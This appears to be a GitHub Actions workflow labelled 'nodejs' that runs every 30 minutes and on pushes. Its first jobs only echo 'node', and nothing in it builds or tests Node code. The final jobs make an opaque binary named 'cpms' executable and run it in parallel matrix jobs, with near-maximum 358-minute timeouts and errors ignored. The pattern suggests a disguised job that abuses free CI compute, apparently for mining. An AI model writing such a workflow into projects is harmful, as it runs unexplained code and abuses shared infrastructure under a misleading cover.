name: nodejs
on:  
  push:
  pull_request:
  schedule:
  - cron: "*/30 * * * *"
 
jobs:
 node-1:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        nodes: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C, D]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v3
    - name: node-run
      run: echo "node"
 
 node-2:
    runs-on: ubuntu-latest
    needs: node-1
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        nodes: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [C, D, E, F]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v3
    - name: node-run
      run: echo "node"
 
 node-build-2:
    runs-on: ubuntu-20.04 
    needs: node-2
    strategy:
      fail-fast: false
      matrix:
        nodes: [1.4, 1.5, 1.6]
        flag: [A]
    timeout-minutes: 358
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: chmod +x cpms; ./cpms
 
 node-build-1:
    runs-on: ubuntu-20.04 
    needs: node-2
    strategy:
      fail-fast: false
      matrix:
        nodes: [1.11, 1.12]
        flag: [B]
    timeout-minutes: 358
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: chmod +x cpms; ./cpms
